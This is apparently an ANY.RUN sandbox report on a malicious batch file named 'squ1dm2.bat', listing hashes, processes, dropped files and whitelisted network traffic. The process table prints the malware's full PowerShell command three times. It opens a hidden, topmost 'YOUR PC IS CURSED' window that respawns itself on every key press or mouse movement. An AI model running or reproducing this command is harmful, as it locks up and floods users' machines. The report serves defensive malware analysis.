| File name: | squ1dm2.bat |
| Full analysis: | https://app.any.run/tasks/32a554ec-c88f-4375-a4a1-e02e36792d3c |
| Verdict: | Malicious activity |
| Analysis date: | May 16, 2025, 02:36:35 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Indicators: | |
| MIME: | text/x-msdos-batch |
| File info: | DOS batch file, ASCII text, with very long lines (1340) |
| MD5: | 02D300CDFC10DED7961BDEEF96F848DD |
| SHA1: | A0B27EE94C772F1908C64743DCA318179A8E6BD5 |
| SHA256: | 3590C79D4502780B743D7EEE5538B76203121372EA8B178763DF899C1B2CD822 |
| SSDEEP: | 24:8pDgVq9FKvDxQiHAC/k6m/gGvfDwdeezyDQCAsthAFViAmD:8pDggK7xQiHd/vlGHDGeezrC+V4D |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 900 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1004 | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ihcdwa2m.cmdline" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 1 Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 1056 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1240 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1348 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-Type -Namespace Win32 -Name NativeMethods -MemberDefinition ' [DllImport(user32.dll)] public static extern int GetWindowLong(IntPtr hWnd, int nIndex); [DllImport(user32.dll)] public static extern int SetWindowLong(IntPtr hWnd, int nIndex, int dwNewLong);';Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName System.Drawing;$f=New-Object Windows.Forms.Form;$f.Text='';$f.TopMost=$true;$f.ShowInTaskbar=$false;$f.FormBorderStyle='None';$f.StartPosition='Manual';$f.KeyPreview=$true;$f.Size=New-Object Drawing.Size(1200,800);$f.Location=New-Object Drawing.Point((Get-Random -Minimum 0 -Maximum 300),(Get-Random -Minimum 0 -Maximum 300));$f.BackColor='Black';$l=New-Object Windows.Forms.Label;$l.Text='YOUR PC IS CURSED. SQU1D HAS COME FOR YOU.';$l.ForeColor='Red';$l.Font=New-Object Drawing.Font('Consolas',36,[Drawing.FontStyle]::Bold);$l.Dock='Fill';$l.TextAlign='MiddleCenter';$f.Controls.Add($l);$hwnd=$f.Handle;$exStyle=[Win32.NativeMethods]::GetWindowLong($hwnd,-20);[Win32.NativeMethods]::SetWindowLong($hwnd,-20,$exStyle -bor 0x80 -bor 0x08000000);$handler={Start-Process powershell -WindowStyle Hidden -ArgumentList '-Command', $MyInvocation.Line};$f.Add_KeyDown($handler);$f.Add_MouseMove($handler);$f.Add_MouseClick($handler);$f.Add_Load($handler);$f.ShowDialog() | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2088 | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\hh4rfqeu.cmdline" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 1 Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 2088 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2140 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2236 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-Type -Namespace Win32 -Name NativeMethods -MemberDefinition ' [DllImport(user32.dll)] public static extern int GetWindowLong(IntPtr hWnd, int nIndex); [DllImport(user32.dll)] public static extern int SetWindowLong(IntPtr hWnd, int nIndex, int dwNewLong);';Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName System.Drawing;$f=New-Object Windows.Forms.Form;$f.Text='';$f.TopMost=$true;$f.ShowInTaskbar=$false;$f.FormBorderStyle='None';$f.StartPosition='Manual';$f.KeyPreview=$true;$f.Size=New-Object Drawing.Size(1200,800);$f.Location=New-Object Drawing.Point((Get-Random -Minimum 0 -Maximum 300),(Get-Random -Minimum 0 -Maximum 300));$f.BackColor='Black';$l=New-Object Windows.Forms.Label;$l.Text='YOUR PC IS CURSED. SQU1D HAS COME FOR YOU.';$l.ForeColor='Red';$l.Font=New-Object Drawing.Font('Consolas',36,[Drawing.FontStyle]::Bold);$l.Dock='Fill';$l.TextAlign='MiddleCenter';$f.Controls.Add($l);$hwnd=$f.Handle;$exStyle=[Win32.NativeMethods]::GetWindowLong($hwnd,-20);[Win32.NativeMethods]::SetWindowLong($hwnd,-20,$exStyle -bor 0x80 -bor 0x08000000);$handler={Start-Process powershell -WindowStyle Hidden -ArgumentList '-Command', $MyInvocation.Line};$f.Add_KeyDown($handler);$f.Add_MouseMove($handler);$f.Add_MouseClick($handler);$f.Add_Load($handler);$f.ShowDialog() | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2268 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-Type -Namespace Win32 -Name NativeMethods -MemberDefinition ' [DllImport(user32.dll)] public static extern int GetWindowLong(IntPtr hWnd, int nIndex); [DllImport(user32.dll)] public static extern int SetWindowLong(IntPtr hWnd, int nIndex, int dwNewLong);';Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName System.Drawing;$f=New-Object Windows.Forms.Form;$f.Text='';$f.TopMost=$true;$f.ShowInTaskbar=$false;$f.FormBorderStyle='None';$f.StartPosition='Manual';$f.KeyPreview=$true;$f.Size=New-Object Drawing.Size(1200,800);$f.Location=New-Object Drawing.Point((Get-Random -Minimum 0 -Maximum 300),(Get-Random -Minimum 0 -Maximum 300));$f.BackColor='Black';$l=New-Object Windows.Forms.Label;$l.Text='YOUR PC IS CURSED. SQU1D HAS COME FOR YOU.';$l.ForeColor='Red';$l.Font=New-Object Drawing.Font('Consolas',36,[Drawing.FontStyle]::Bold);$l.Dock='Fill';$l.TextAlign='MiddleCenter';$f.Controls.Add($l);$hwnd=$f.Handle;$exStyle=[Win32.NativeMethods]::GetWindowLong($hwnd,-20);[Win32.NativeMethods]::SetWindowLong($hwnd,-20,$exStyle -bor 0x80 -bor 0x08000000);$handler={Start-Process powershell -WindowStyle Hidden -ArgumentList '-Command', $MyInvocation.Line};$f.Add_KeyDown($handler);$f.Add_MouseMove($handler);$f.Add_MouseClick($handler);$f.Add_Load($handler);$f.ShowDialog() | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7360 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mpymaltm.gyo.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7360 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_alc4dyke.oas.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7360 | powershell.exe | C:\Users\admin\AppData\Local\Temp\w3uge02t.cmdline | text | |
MD5:6FEB2C5EF040AE0E71BFC5E86066EFD2 | SHA256:91AC21CE47C13EAED0E30018919EEB1EAF9CC55C9F23019DE8F8903833E1D098 | |||
| 7732 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ktvc4gdg.rqm.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7360 | powershell.exe | C:\Users\admin\AppData\Local\Temp\w3uge02t.0.cs | text | |
MD5:913A1340026383C1DB517F224DE53001 | SHA256:9F7B2FE697B2D70BA11DBB2DE211E54CA9174A7A552801CDB9C1B742CCCFAC3E | |||
| 7628 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCA96F14D88D3455F9AF059D9A0767943.TMP | binary | |
MD5:0F822F29CB90D54FED7E79DA9EEC9F19 | SHA256:63B4103AC359FD26B2B805BD02F222D14459665509EB4A9D957F18F36861D359 | |||
| 7648 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESC4C9.tmp | binary | |
MD5:C8D70EC49EBEFE4E34DF1A75DB67E385 | SHA256:B84C3B8052C71CE8AC334C68E725F655758D60DEFD80C62F2EBB5956F30B6864 | |||
| 7628 | csc.exe | C:\Users\admin\AppData\Local\Temp\w3uge02t.dll | executable | |
MD5:BC60AE4709B118074696111B4878C0A7 | SHA256:D379BC4A670F8D3AE8107E7564F822DD5FD2356B84031A82C58C993659417AA5 | |||
| 8040 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cnkik4rr.4gb.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7628 | csc.exe | C:\Users\admin\AppData\Local\Temp\w3uge02t.out | text | |
MD5:4803B9A9F322C809878BB4718AC02F54 | SHA256:0EE1EFA8AAC599B679E1CE60307F841D0E719E78C266AB828D1A9D5390E98C45 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6512 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
6512 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 51.124.78.146:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 23.53.40.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
2104 | svchost.exe | 51.124.78.146:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | 23.53.40.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5496 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
6544 | svchost.exe | 40.126.32.133:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
Domain | IP | Reputation |
|---|---|---|
crl.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |